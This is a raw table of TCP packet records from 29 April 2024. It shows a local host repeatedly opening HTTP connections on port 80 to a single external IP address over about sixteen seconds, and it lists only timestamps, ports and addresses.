Apr 29, 2024 01:04:00.905810118 CEST	80	49839	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.905838966 CEST	80	49839	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.905890942 CEST	49839	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.029918909 CEST	49839	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.030633926 CEST	49840	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.140404940 CEST	80	49840	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.140485048 CEST	49840	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.140516043 CEST	80	49839	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.140563965 CEST	49839	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.140768051 CEST	49840	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.250416040 CEST	80	49840	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.250791073 CEST	80	49840	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.251157999 CEST	49840	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.402671099 CEST	80	49840	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.538602114 CEST	80	49840	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.538631916 CEST	80	49840	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.538714886 CEST	49840	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.655055046 CEST	49840	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.655627012 CEST	49841	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.765289068 CEST	80	49841	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.765449047 CEST	49841	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.765672922 CEST	49841	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.765860081 CEST	80	49840	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.765933990 CEST	49840	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:01.875341892 CEST	80	49841	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.875602007 CEST	80	49841	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:01.875768900 CEST	49841	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:02.027441025 CEST	80	49841	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:02.256828070 CEST	80	49841	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:02.256863117 CEST	80	49841	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:02.256926060 CEST	49841	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:02.378201962 CEST	49841	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:02.378926039 CEST	49842	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:02.488523006 CEST	80	49841	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:02.488558054 CEST	80	49842	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:02.488656998 CEST	49841	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:02.488782883 CEST	49842	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:02.488981962 CEST	49842	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:02.598619938 CEST	80	49842	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:02.598855972 CEST	80	49842	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:02.599033117 CEST	49842	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:02.750579119 CEST	80	49842	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.009771109 CEST	80	49842	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.009799957 CEST	80	49842	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.009870052 CEST	49842	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.135107994 CEST	49842	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.135790110 CEST	49843	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.245609999 CEST	80	49842	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.245671034 CEST	49842	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.246103048 CEST	80	49843	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.246169090 CEST	49843	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.246301889 CEST	49843	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.356566906 CEST	80	49843	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.356931925 CEST	80	49843	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.357342958 CEST	49843	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.508882999 CEST	80	49843	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.644119024 CEST	80	49843	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.644138098 CEST	80	49843	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.644153118 CEST	80	49843	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.644274950 CEST	49843	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.766015053 CEST	49843	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.766832113 CEST	49844	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.876671076 CEST	80	49844	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.876698971 CEST	80	49843	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.876976967 CEST	49843	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.876998901 CEST	49844	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.877373934 CEST	49844	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:03.986990929 CEST	80	49844	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.987341881 CEST	80	49844	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:03.987478018 CEST	49844	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:04.137995958 CEST	80	49844	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:04.384368896 CEST	80	49844	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:04.384398937 CEST	80	49844	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:04.384462118 CEST	49844	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:04.499461889 CEST	49844	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:04.499871969 CEST	49845	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:04.610189915 CEST	80	49844	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:04.610215902 CEST	80	49845	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:04.610541105 CEST	49845	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:04.610542059 CEST	49844	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:04.610742092 CEST	49845	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:04.720958948 CEST	80	49845	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:04.721499920 CEST	80	49845	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:04.721692085 CEST	49845	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:04.872121096 CEST	80	49845	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:04.925718069 CEST	49846	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.011948109 CEST	80	49845	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.011967897 CEST	80	49845	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.012046099 CEST	49845	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.035286903 CEST	80	49846	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.035367012 CEST	49846	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.035499096 CEST	49846	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.137974024 CEST	49845	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.138645887 CEST	49847	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.145435095 CEST	80	49846	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.145749092 CEST	80	49846	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.145884991 CEST	49846	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.248260975 CEST	80	49847	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.248446941 CEST	49847	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.248526096 CEST	49847	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.249572992 CEST	80	49845	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.249624014 CEST	49845	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.255441904 CEST	80	49846	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.358082056 CEST	80	49847	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.358450890 CEST	80	49847	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.358748913 CEST	49847	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.508804083 CEST	80	49847	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.541260004 CEST	80	49846	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.541279078 CEST	80	49846	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.541367054 CEST	49846	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.757422924 CEST	80	49847	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.757441998 CEST	80	49847	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.757545948 CEST	49847	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.873084068 CEST	49846	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.873143911 CEST	49847	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.874067068 CEST	49848	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.983145952 CEST	80	49847	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.983205080 CEST	49847	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.983781099 CEST	80	49846	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.983829021 CEST	49846	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.984291077 CEST	80	49848	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:05.984379053 CEST	49848	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:05.984491110 CEST	49848	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:06.094888926 CEST	80	49848	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:06.094963074 CEST	80	49848	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:06.095096111 CEST	49848	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:06.246277094 CEST	80	49848	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:06.495512962 CEST	80	49848	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:06.495558977 CEST	80	49848	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:06.495718002 CEST	49848	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:06.613651037 CEST	49848	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:06.614371061 CEST	49849	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:06.724199057 CEST	80	49849	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:06.724312067 CEST	49849	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:06.724426985 CEST	49849	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:06.724870920 CEST	80	49848	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:06.724929094 CEST	49848	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:06.834047079 CEST	80	49849	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:06.834544897 CEST	80	49849	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:06.834722996 CEST	49849	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:06.985337019 CEST	80	49849	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.119360924 CEST	80	49849	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.119385004 CEST	80	49849	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.119584084 CEST	49849	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:07.247919083 CEST	49849	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:07.251683950 CEST	49850	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:07.357989073 CEST	80	49849	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.358198881 CEST	49849	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:07.361462116 CEST	80	49850	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.361536026 CEST	49850	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:07.361618042 CEST	49850	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:07.471362114 CEST	80	49850	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.471734047 CEST	80	49850	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.471844912 CEST	49850	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:07.622831106 CEST	80	49850	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.863656998 CEST	80	49850	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.863677979 CEST	80	49850	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:07.863727093 CEST	49850	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:07.986809015 CEST	49850	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:07.987560034 CEST	49851	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.097146988 CEST	80	49851	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.097212076 CEST	49851	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.097338915 CEST	49851	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.097378969 CEST	80	49850	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.097425938 CEST	49850	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.206984043 CEST	80	49851	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.207310915 CEST	80	49851	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.207504988 CEST	49851	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.357575893 CEST	80	49851	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.592755079 CEST	80	49851	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.592776060 CEST	80	49851	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.592926025 CEST	49851	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.719279051 CEST	49851	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.720240116 CEST	49852	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.829200029 CEST	80	49851	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.829345942 CEST	49851	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.830530882 CEST	80	49852	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.830599070 CEST	49852	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.830729008 CEST	49852	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:08.940885067 CEST	80	49852	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.941306114 CEST	80	49852	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:08.941441059 CEST	49852	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:09.092360973 CEST	80	49852	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:09.331783056 CEST	80	49852	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:09.331850052 CEST	80	49852	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:09.332076073 CEST	49852	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:09.456366062 CEST	49852	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:09.456765890 CEST	49853	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:09.566518068 CEST	80	49853	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:09.566726923 CEST	49853	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:09.566958904 CEST	49853	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:09.568222046 CEST	80	49852	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:09.568300009 CEST	49852	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:09.676597118 CEST	80	49853	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:09.676834106 CEST	80	49853	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:09.677076101 CEST	49853	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:09.827012062 CEST	80	49853	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.071346998 CEST	80	49853	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.071391106 CEST	80	49853	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.071440935 CEST	49853	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.189929962 CEST	49853	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.190644979 CEST	49854	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.299909115 CEST	80	49853	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.300071955 CEST	49853	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.300440073 CEST	80	49854	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.300499916 CEST	49854	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.300725937 CEST	49854	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.410372019 CEST	80	49854	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.411166906 CEST	80	49854	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.411284924 CEST	49854	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.550416946 CEST	49855	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.561634064 CEST	80	49854	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.660657883 CEST	80	49855	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.660728931 CEST	49855	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.660840034 CEST	49855	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.771064997 CEST	80	49855	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.771373034 CEST	80	49855	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.771589994 CEST	49855	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.806148052 CEST	80	49854	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.806165934 CEST	80	49854	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.806180954 CEST	80	49854	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.806247950 CEST	49854	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.882119894 CEST	80	49855	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:10.918277979 CEST	49854	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:10.918890953 CEST	49856	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.028456926 CEST	80	49856	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.028481960 CEST	80	49854	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.028559923 CEST	49856	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.028573036 CEST	49854	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.028718948 CEST	49856	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.074836016 CEST	80	49855	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.074853897 CEST	80	49855	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.074901104 CEST	49855	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.138185024 CEST	80	49856	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.138499975 CEST	80	49856	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.138716936 CEST	49856	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.289906979 CEST	80	49856	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.540447950 CEST	80	49856	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.540555954 CEST	80	49856	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.540626049 CEST	49856	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.655049086 CEST	49855	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.655050039 CEST	49856	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.655781984 CEST	49857	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.765039921 CEST	80	49856	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.765103102 CEST	49856	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.765460968 CEST	80	49857	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.765536070 CEST	49857	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.765644073 CEST	49857	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.765737057 CEST	80	49855	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.765803099 CEST	49855	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:11.875439882 CEST	80	49857	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.876087904 CEST	80	49857	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:11.876220942 CEST	49857	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:12.026669979 CEST	80	49857	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:12.272984028 CEST	80	49857	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:12.273015022 CEST	80	49857	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:12.274576902 CEST	49857	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:12.392990112 CEST	49857	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:12.394308090 CEST	49858	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:12.504327059 CEST	80	49857	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:12.504357100 CEST	80	49858	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:12.504419088 CEST	49857	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:12.504463911 CEST	49858	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:12.504597902 CEST	49858	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:12.614403009 CEST	80	49858	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:12.614660978 CEST	80	49858	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:12.614815950 CEST	49858	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:12.765386105 CEST	80	49858	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.043832064 CEST	80	49858	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.043852091 CEST	80	49858	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.043960094 CEST	49858	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:13.174196959 CEST	49858	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:13.175101995 CEST	49859	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:13.284152985 CEST	80	49858	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.284239054 CEST	49858	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:13.284804106 CEST	80	49859	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.284877062 CEST	49859	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:13.285198927 CEST	49859	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:13.394814014 CEST	80	49859	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.395109892 CEST	80	49859	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.395252943 CEST	49859	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:13.545623064 CEST	80	49859	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.799397945 CEST	80	49859	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.799417973 CEST	80	49859	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:13.799485922 CEST	49859	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:13.922163963 CEST	49859	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:13.922808886 CEST	49860	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.032255888 CEST	80	49859	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.032423019 CEST	49859	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.033345938 CEST	80	49860	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.033412933 CEST	49860	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.033524036 CEST	49860	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.143951893 CEST	80	49860	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.144510031 CEST	80	49860	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.144634008 CEST	49860	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.295423031 CEST	80	49860	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.564297915 CEST	80	49860	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.564321041 CEST	80	49860	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.564378977 CEST	49860	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.693479061 CEST	49860	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.694051027 CEST	49861	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.803793907 CEST	80	49861	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.803875923 CEST	49861	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.804089069 CEST	49861	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.805108070 CEST	80	49860	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.805155039 CEST	49860	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:14.913723946 CEST	80	49861	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.914371014 CEST	80	49861	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:14.914788961 CEST	49861	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.066559076 CEST	80	49861	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.193953037 CEST	80	49861	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.193973064 CEST	80	49861	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.194032907 CEST	49861	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.324033976 CEST	49861	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.327222109 CEST	49862	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.434514999 CEST	80	49861	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.434644938 CEST	49861	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.437500954 CEST	80	49862	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.437716961 CEST	49862	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.437788010 CEST	49862	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.548368931 CEST	80	49862	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.548541069 CEST	80	49862	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.548814058 CEST	49862	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.699440002 CEST	80	49862	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.832899094 CEST	80	49862	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.832917929 CEST	80	49862	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:15.833086014 CEST	49862	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.950331926 CEST	49862	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:15.950963020 CEST	49863	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.061018944 CEST	80	49862	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.061069012 CEST	49862	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.061249018 CEST	80	49863	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.061309099 CEST	49863	80	192.168.2.4	172.67.144.153
